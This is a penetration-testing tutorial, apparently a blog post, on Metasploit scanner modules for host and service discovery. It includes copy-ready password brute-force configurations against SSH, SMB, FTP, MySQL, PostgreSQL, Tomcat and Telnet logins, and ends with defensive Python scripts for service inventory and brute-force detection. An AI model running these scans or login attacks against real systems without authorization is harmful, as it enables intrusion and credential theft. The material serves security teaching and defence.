
# MSF Service Scanning and Brute-Forcing

Metasploit is a widely used penetration-testing tool and exploitation framework for assessing the security of computer systems, applications and networks. It was originally developed by HD Moore and is now maintained and supported by Rapid7. Its main capabilities are:

- Vulnerability scanning and exploitation: Metasploit can scan a target system, identify potential vulnerabilities and exploit them to gain access to the target. This covers operating-system, application and service vulnerabilities.
- Payload generation: Metasploit can generate a wide range of payloads, the code that runs on the target system after a successful attack, including reverse shells and Meterpreter sessions.
- Vulnerability database: Metasploit maintains an extensive database of vulnerabilities in operating systems, applications and services, so testers can quickly identify vulnerabilities on a target system.
- Modular framework: Metasploit is built from modules, so users load only the module types they need, such as scanner modules, exploit modules and payload modules.
- Broad protocol support: Metasploit supports many network protocols and services, including TCP, UDP, HTTP, HTTPS and FTP, so it can test many kinds of systems and applications.
- Interfaces: Metasploit offers a web-based user interface (Metasploit Framework Web UI) as well as a command-line interface.
- Community and commercial editions: there is a strong community edition, Metasploit Framework, and a commercial edition, Metasploit Pro, which adds advanced features and support for enterprises and professional testers.

Service discovery is the part of the Metasploit Framework (MSF) used to identify the hosts and services running on a target network. It is an important step in penetration testing and vulnerability assessment, since it tells the tester how exposed the target is and which vulnerabilities might apply. In outline, MSF service discovery covers:

- Host discovery: MSF sends packets to the target network and listens for replies to determine which hosts are alive, using ping, ARP, TCP and UDP scans.
- Port scanning: once live hosts are known, MSF scans them to find open ports and the network services behind them, which narrows down the services that may be vulnerable and need further assessment.
- Service identification: for each open port, MSF tries to identify the specific service and application version, so the tester knows which software is in use and can look up known vulnerabilities.
- OS fingerprinting: MSF tries to determine the target's operating-system type and version, which helps in choosing a suitable exploit module.
- Vulnerability scanning: MSF integrates with vulnerability databases to automatically identify known vulnerabilities on the target, which helps the tester find potential attack targets quickly.
- Custom modules: service discovery is highly customizable; users can write their own modules and scripts for specific discovery tasks.

Service discovery is most often used to find the common services on a local network, such as HTTP, FTP and Telnet.

## MSF module search

```
[root@localhost ~]# msfconsole
msf5 > search scanner type:auxiliary
msf5 > search scanner/http type:auxiliary    // search all HTTP-related modules
```

### Discovering HTTP services

HTTP services are found with scanner/http/http_version.

```
msf5 > use scanner/http/http_version
msf5 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/http/http_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/http/http_version) > set rport 80
rport => 80
msf5 auxiliary(scanner/http/http_version) > exploit

[+] 192.168.1.7:80 Apache/2.4.6 (CentOS) PHP/5.4.16 ( Powered by PHP/5.4.16, 302-login.php )
[+] 192.168.1.3:80 Apache/2.5.0 (CentOS) PHP/7.0.0 ( Powered by PHP/7.0.0, 302-admin.php )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

### Discovering SMB services

SMB services are found with scanner/smb/smb_version.

```
msf5 > use scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/smb/smb_version) > exploit

[+] 192.168.1.2:445 - Host is running Windows 10 China (name:lyshark) (workgroup:lyshark)
[*] 192.168.1.7:445 - Host could not be identified: Windows 6.1 (Samba 4.8.3)
[*] 192.168.1.0/24:445 - Scanned 26 of 256 hosts (10% complete)
[*] 192.168.1.0/24:445 - Caught interrupt from the console...
[*] Auxiliary module execution completed
```

### Discovering FTP services

FTP services are found with scanner/ftp/ftp_version.

```
msf5 > use scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > show options

Module options (auxiliary/scanner/ftp/ftp_version):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS   192.168.1.0/24       yes       The target address range or CIDR identifier
   RPORT    21                   yes       The target port (TCP)
   THREADS  10                   yes       The number of concurrent threads

msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/ftp/ftp_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/ftp/ftp_version) > exploit

[+] 192.168.1.7:21 - FTP Banner: 220 (vsFTPd 3.0.2)\x0d\x0a
[*] 192.168.1.0/24:21 - Scanned 32 of 256 hosts (12% complete)
[*] 192.168.1.0/24:21 - Caught interrupt from the console...
[*] Auxiliary module execution completed
```

### Discovering SSH services

SSH services are found with auxiliary/scanner/ssh/ssh_version.

```
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT    22               yes       The target port (TCP)
   THREADS  10               yes       The number of concurrent threads
   TIMEOUT  30               yes       Timeout for the SSH probe

msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/ssh/ssh_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/ssh/ssh_version) > exploit

[+] 192.168.1.7:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.1.0/24:22 - Caught interrupt from the console...
[*] Auxiliary module execution completed
```

### Discovering Telnet services

Telnet services are found with auxiliary/scanner/telnet/telnet_version.

```
msf5 > use auxiliary/scanner/telnet/telnet_version
msf5 auxiliary(scanner/telnet/telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS    192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT     23               yes       The target port (TCP)
   THREADS   10               yes       The number of concurrent threads
   TIMEOUT   30               yes       Timeout for the Telnet probe
   USERNAME                   no        The username to authenticate as

msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/telnet/telnet_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/telnet/telnet_version) > exploit

[-] 192.168.1.1:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.1:23).
[-] 192.168.1.7:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.7:23).
[-] 192.168.1.0:23 - A network issue has occurred: The host (192.168.1.0:23) was unreachable.
[-] 192.168.1.10:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.10:23).
[-] 192.168.1.3:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.3:23).
[-] 192.168.1.5:23 - A network issue has occurred: The host (192.168.1.5:23) was unreachable.
[*] 192.168.1.0/24:23 - Caught interrupt from the console...
[*] Auxiliary module execution completed
```

### Discovering MySQL services

MySQL services are found with auxiliary/scanner/mysql/mysql_version.

```
msf5 > use auxiliary/scanner/mysql/mysql_version
msf5 auxiliary(scanner/mysql/mysql_version) > show options

Module options (auxiliary/scanner/mysql/mysql_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.7      yes       The target address range or CIDR identifier
   RPORT    3306             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads

msf5 auxiliary(scanner/mysql/mysql_version) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/mysql/mysql_version) > set rport 3306
rport => 3306
msf5 auxiliary(scanner/mysql/mysql_version) > exploit

[*] 192.168.1.7:3306 - 192.168.1.7:3306 is running MySQL, but responds with an error: \x04Host 192.168.1.7 is not allowed to connect to this MariaDB server
[*] 192.168.1.7:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

### Discovering MSSQL services

SQL Server services are found with auxiliary/scanner/mssql/mssql_ping.

```
msf5 > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS               192.168.1.0/24   yes       The target address range or CIDR identifier
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              10               yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/mssql/mssql_ping) > set threads 10
threads => 10
msf5 auxiliary(scanner/mssql/mssql_ping) > run
```

### Discovering Oracle services

Oracle services are found with auxiliary/scanner/oracle/tnslsnr_version.

```
msf5 > use auxiliary/scanner/oracle/tnslsnr_version
msf5 auxiliary(scanner/oracle/tnslsnr_version) > show options

Module options (auxiliary/scanner/oracle/tnslsnr_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT    1521             yes       The target port (TCP)
   THREADS  10               yes       The number of concurrent threads

msf5 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/oracle/tnslsnr_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/oracle/tnslsnr_version) > run
```

## Host discovery

MSF provides several auxiliary modules for host discovery. They live in the modules/auxiliary/scanner/discovery/ directory of the Metasploit Framework and implement host discovery and network probing:

- arp_sweep: performs an ARP scan to determine which hosts on the target network are alive.
- ipv6_multicast_ping: a multicast ping scan for IPv6 networks, used to identify hosts on an IPv6 network.
- ipv6_neighbor and ipv6_neighbor_router_advertisement: neighbor discovery and router-advertisement scans for IPv6 networks, which help identify hosts and routers on an IPv6 network.
- udp_probe and udp_sweep: UDP port scans to determine which UDP ports are open on a target host.

These modules help the tester identify potential attack targets on the network, such as live hosts and open ports, and give a better picture of the network's structure and weaknesses for further assessment and testing.

### ARP discovery of LAN hosts

Live hosts on the LAN are found with scanner/discovery/arp_sweep.

```
msf5 > use scanner/discovery/arp_sweep
msf5 auxiliary(scanner/discovery/arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    10               yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 10
threads => 10
msf5 auxiliary(scanner/discovery/arp_sweep) > exploit

[+] 192.168.1.1 appears to be up (UNKNOWN).
[+] 192.168.1.2 appears to be up (UNKNOWN).
[+] 192.168.1.2 appears to be up (UNKNOWN).
[+] 192.168.1.1 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```

### UDP discovery of LAN hosts

Live hosts on the LAN are found with scanner/discovery/udp_sweep.

```
msf5 > use scanner/discovery/udp_sweep
msf5 auxiliary(scanner/discovery/udp_sweep) > show options

Module options (auxiliary/scanner/discovery/udp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/discovery/udp_sweep) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/udp_sweep) > exploit

[*] Sending 13 probes to 192.168.1.0->192.168.1.255 (256 hosts)
[*] Discovered NetBIOS on 192.168.1.2:137 (lyshark:<20>:U :lysahrk:<00>:U :lyshark:<00>:G :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U :__MSBROWSE__:<01>:G :a4:be:c8:fe:ac:z4)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```

### ACK scan of LAN hosts

Live hosts are scanned with auxiliary/scanner/portscan/ack.

```
msf5 > use auxiliary/scanner/portscan/ack
msf5 auxiliary(scanner/portscan/ack) > show options

Module options (auxiliary/scanner/portscan/ack):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    10               yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/ack) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/ack) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/ack) > exploit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

### SYN scan of LAN hosts

Live hosts are scanned with auxiliary/scanner/portscan/syn.

```
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-1024           yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    10               yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/syn) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/syn) > run
```

### TCP scan of LAN hosts

Live hosts are scanned with auxiliary/scanner/portscan/tcp.

```
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.1.7      yes       The target address range or CIDR identifier
   THREADS      10               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.1.7:      - 192.168.1.7:21 - TCP OPEN
[+] 192.168.1.7:      - 192.168.1.7:22 - TCP OPEN
[+] 192.168.1.7:      - 192.168.1.7:80 - TCP OPEN
[+] 192.168.1.7:      - 192.168.1.7:139 - TCP OPEN
[+] 192.168.1.7:      - 192.168.1.7:445 - TCP OPEN
[*] 192.168.1.7:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

## Service brute-forcing

Once the open services on a target host are known, a tester may try a dictionary attack against the login credentials to check whether the host can be penetrated further. The following are common brute-force configurations; they show how to set up a brute-forcing tool such as Metasploit or Hydra for a dictionary attack. These are configuration demonstrations only; real brute-forcing may require authorization and must comply with legal and ethical rules.

### SSH password brute-forcing

```
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.7
set username root
set pass_file /root/pass.txt
set threads 10
exploit
```

### Samba password brute-forcing

```
use auxiliary/scanner/smb/smb_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
set threads 10
exploit
```

### FTP password brute-forcing

```
use scanner/ftp/ftp_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
set threads 10
exploit
```

### MySQL password brute-forcing

```
search mysql
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit
```

### PostgreSQL password brute-forcing

```
use auxiliary/scanner/postgres/postgres_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit
```

### Tomcat password brute-forcing

```
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit
```

### Telnet password brute-forcing

```
use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.1.7
set username administrator
set pass_file /root/pass.txt
exploit
```
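The scanner output above only becomes useful to a defender once it is turned into an inventory that can be compared with what is supposed to be exposed. The following Python script is an added example, not part of the original post and not Metasploit code: it parses lines in the formats printed by the modules above (constructed sample lines, including the `[+]`, `[*]` and `[-]` markers), builds a host-to-port-to-banner inventory, and reports listeners that an assumed exposure policy (`EXPECTED_EXPOSURE`, a stand-in for a real asset register) does not allow, plus hosts the register does not know about. Progress lines, interrupt lines and `[-]` connection failures are deliberately skipped so they do not show up as services.

```python
"""Turn msfconsole scanner output into a per-host service inventory and
diff it against an expected-exposure policy.

Added example (not part of the original post, not Metasploit code). The
output lines are constructed in the shapes printed by http_version,
smb_version, ftp_version, ssh_version, mysql_version, portscan/tcp and
arp_sweep; the policy is an assumption standing in for a real asset register.
"""
import re
from collections import defaultdict

# Constructed sample output (not a real scan).
SAMPLE_OUTPUT = """\
[+] 192.168.1.7:80 Apache/2.4.6 (CentOS) PHP/5.4.16 ( Powered by PHP/5.4.16, 302-login.php )
[+] 192.168.1.3:80 Apache/2.5.0 (CentOS) PHP/7.0.0 ( Powered by PHP/7.0.0, 302-admin.php )
[+] 192.168.1.2:445 - Host is running Windows 10 China (name:lyshark) (workgroup:lyshark)
[*] 192.168.1.7:445 - Host could not be identified: Windows 6.1 (Samba 4.8.3)
[+] 192.168.1.7:21 - FTP Banner: 220 (vsFTPd 3.0.2)\\x0d\\x0a
[+] 192.168.1.7:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.product=OpenSSH )
[-] 192.168.1.3:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.3:23).
[*] 192.168.1.7:3306 - 192.168.1.7:3306 is running MySQL, but responds with an error: \\x04Host 192.168.1.7 is not allowed to connect to this MariaDB server
[*] 192.168.1.7:3306 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.7:       - 192.168.1.7:139 - TCP OPEN
[+] 192.168.1.1 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# Assumed policy: which ports each host is allowed to expose. Hosts that
# are absent may expose nothing.
EXPECTED_EXPOSURE = {"192.168.1.7": {22, 80}, "192.168.1.3": {80}}

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
# portscan/tcp: "[+] host:       - host:port - TCP OPEN"
OPEN_RE = re.compile(rf"^\[\+\] ({IP}):\s+-\s+\1:(\d+) - TCP OPEN$")
# arp_sweep: "[+] host appears to be up (...)"
UP_RE = re.compile(rf"^\[\+\] ({IP}) appears to be up")
# version modules: "[+] host:port <banner>" or "[*] host:port - <banner>"
BANNER_RE = re.compile(rf"^\[[+*]\] ({IP}):(\d+)\s*-?\s*(.*)$")


def parse_scan_output(text):
    """Return (hosts_up, services): hosts_up is the set of IPs seen alive,
    services maps host -> {port: banner}. '[-]' lines and progress lines
    are ignored because they do not describe a listening service."""
    hosts_up = set()
    services = defaultdict(dict)
    for line in text.splitlines():
        line = line.rstrip()
        m = OPEN_RE.match(line)
        if m:
            host, port = m.group(1), int(m.group(2))
            services[host].setdefault(port, "TCP OPEN")  # keep a richer banner if present
            hosts_up.add(host)
            continue
        m = UP_RE.match(line)
        if m:
            hosts_up.add(m.group(1))
            continue
        m = BANNER_RE.match(line)
        if not m:
            continue
        host, port, rest = m.group(1), int(m.group(2)), m.group(3)
        if rest.startswith(("Scanned", "Caught interrupt")):
            continue  # progress output, not a service
        prefix = f"{host}:{port} "
        if rest.startswith(prefix):  # mysql_version repeats host:port in the message
            rest = rest[len(prefix):]
        rest = rest.replace("\\x0d\\x0a", "").strip()  # drop the escaped CRLF ftp_version prints
        services[host][port] = rest
        hosts_up.add(host)
    return hosts_up, dict(services)


def unexpected_exposure(services, policy):
    """List (host, port, banner) for every listener the policy does not allow."""
    findings = []
    for host, ports in sorted(services.items()):
        allowed = policy.get(host, set())
        for port, banner in sorted(ports.items()):
            if port not in allowed:
                findings.append((host, port, banner))
    return findings


def unregistered_hosts(hosts_up, policy):
    """Hosts that answered a probe but are not in the asset register at all."""
    return sorted(h for h in hosts_up if h not in policy)


if __name__ == "__main__":
    up, svc = parse_scan_output(SAMPLE_OUTPUT)
    for host, port, banner in unexpected_exposure(svc, EXPECTED_EXPOSURE):
        print(f"UNEXPECTED {host}:{port}  {banner}")
    for host in unregistered_hosts(up, EXPECTED_EXPOSURE):
        print(f"UNREGISTERED HOST {host}")
```

Feed it the saved msfconsole output (`spool` in msfconsole writes one) and keep the policy under version control; a diff against the previous run then shows exactly which listeners appeared since the last scan.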
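On the receiving end, every login module in the brute-forcing section above produces a burst of failed authentications from one source address in a short window, and that burst is the signal to alert on. The following Python script is an added example, not part of the original post: it runs a sliding-window count over constructed sshd lines in the syslog-style auth.log format, raises one alert when a source crosses the failure threshold, and a higher-priority alert when that same source later gets an Accepted login. The threshold, window and log lines are assumptions to be tuned per environment; the same windowed counting applies to the FTP, SMB, MySQL and other login modules once their servers' logs are parsed.

```python
"""Flag password guessing against SSH from auth.log lines.

Added example (not part of the original post). The log lines are
constructed in the format sshd writes to auth.log on Debian/Ubuntu hosts;
threshold and window are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: six failures and then a success from one source,
# plus a single typo and a key-based login from a legitimate user.
SAMPLE_AUTH_LOG = """\
Mar 10 10:00:01 web1 sshd[2101]: Failed password for root from 192.168.1.9 port 51234 ssh2
Mar 10 10:00:02 web1 sshd[2103]: Failed password for root from 192.168.1.9 port 51236 ssh2
Mar 10 10:00:02 web1 sshd[2105]: Failed password for invalid user admin from 192.168.1.9 port 51238 ssh2
Mar 10 10:00:03 web1 sshd[2107]: Failed password for root from 192.168.1.9 port 51240 ssh2
Mar 10 10:00:04 web1 sshd[2109]: Failed password for root from 192.168.1.9 port 51242 ssh2
Mar 10 10:00:05 web1 sshd[2111]: Failed password for root from 192.168.1.9 port 51244 ssh2
Mar 10 10:00:06 web1 sshd[2113]: Accepted password for root from 192.168.1.9 port 51246 ssh2
Mar 10 10:30:00 web1 sshd[2200]: Failed password for alice from 192.168.1.20 port 40000 ssh2
Mar 10 10:31:00 web1 sshd[2201]: Accepted publickey for alice from 192.168.1.20 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_ts(ts, year=2024):
    """Syslog timestamps carry no year; assume one so lines can be compared."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Return alerts as (kind, source, detail) tuples.

    'bruteforce' fires once per source that accumulates `threshold` failed
    logins within `window_seconds`; 'success_after_bruteforce' fires for
    every Accepted login from an already-flagged source, which is the case
    worth paging on.
    """
    failures = defaultdict(deque)  # src -> timestamps of failures inside the window
    flagged = set()
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src = parse_ts(m["ts"]), m["src"]
        if m["result"] == "Failed":
            q = failures[src]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()  # forget failures older than the window
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, f"{len(q)} failures in {window_seconds}s"))
        elif src in flagged:
            alerts.append(("success_after_bruteforce", src, f"{m['method']} login as {m['user']}"))
    return alerts


if __name__ == "__main__":
    for kind, src, detail in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{kind:26} {src:15} {detail}")
```

The window is what separates a real guessing run from a user mistyping a password a few times over an afternoon; the single failure from 192.168.1.20 never reaches the threshold, while the six-in-five-seconds burst from 192.168.1.9 does, and its subsequent accepted password login is reported separately.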